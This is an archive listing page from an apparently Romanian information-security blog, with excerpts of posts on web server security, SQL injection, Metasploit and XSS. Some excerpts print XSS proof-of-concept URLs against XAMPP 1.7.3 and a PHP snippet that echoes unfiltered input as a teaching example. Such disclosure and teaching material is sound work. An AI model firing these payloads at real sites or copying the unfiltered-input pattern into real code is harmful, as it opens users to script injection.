Arhiva | Securitatea retelelor RSS pentru aceasta categorie
Securitatea serverelor web - Securitatea Informatica

Securitatea serverelor web

Făcând o descriere metaforică, un server web poate fi comparat cu un chelner dintrun restaurant. Chelnerul va fi serverul web, restaurantul va fi mediul în care acesta lucrează (in special sistemul de operare), bucătăria restaurantului va fi sistemul de fişiere din care serverul web va alege fişierele cerute de clienţi. Această comparaţie este posibilă deoarece [...]

Citeşte mai mult
Tutorial SQL Inject - Securitatea Informatica

Tutorial SQL Inject

1. Introducere: Astazi, foarte multe aplicatii web isi pastreaza datele in baza de date , deoarece acest lucru permite generarea de pagini dinamice. Aplicatia web primeste de la utilizator date, aceste date sunt utilizate de aplicatie/script pentru a genera o cerere la baza de date. In majoritatea cazurilor pentru a genera cereri la baza de [...]

Citeşte mai mult
Vulnerabilitate XAMPP 1.7.3 – XSS - Securitatea Informatica

Vulnerabilitate XAMPP 1.7.3 – XSS

Data: 11/06/2010 Exploit: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script>

Citeşte mai mult
Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8 - Securitatea Informatica

Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8

Data: 20 noiembrie 2010 Descriere: Acest cod exploateaza o vulnerabilitate unserialize() in componenta de securitate a CakePHP. Mai multe detalii aici. Acest exploit functioneaza impotriva oricarei aplicatii dezvoltate pe framework-ul CakePHP care foloseste form-uri POST cu token-uri de securitate si foloseste configuratia Cache default (file-system caching). Este posibila exploatarea si pentru alte tipuri de cache [...]

Citeşte mai mult
Metasploit - Securitatea Informatica

Metasploit

Proiectul Metasploit este un proiect open-source de securitate informatică care oferă informaţii cu privire la vulnerabilităţile de securitate şi ajutor în teste de penetrare. Cel mai bine-cunoscut sub-proiect este framework-ul Metasploit, un instrument pentru dezvoltarea şi executarea exploit-urilor pe o maşină ţintă. Alte sub-proiecte importante sunt baza de date Opcode si arhiva shellcode. Proiectul Metasploit [...]

Citeşte mai mult
Vulnerabilitati PHP – Cross-Site Scripting - Securitatea Informatica

Vulnerabilitati PHP – Cross-Site Scripting

Sfaturi : Puteţi folosii o mulţime de vectori, puteţi încerca o grămadă de metode de a trece peste protecţii, îi puteţi găsii pe internet. Exemplu de bază Cod:. <?php $name=$_GET['name']; print $name; ?> Inputul nu este filtrat, un atacator poate injecta cod JavaScript. Exemplu: http://127.0.0.1/test.php?name=<script>alert(”XSS”)</script> Un popup cu mesajul XSS va fi afişat. Codul JavaScript a [...]

Citeşte mai mult
Pagina 3 din 812345...Ultima »
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro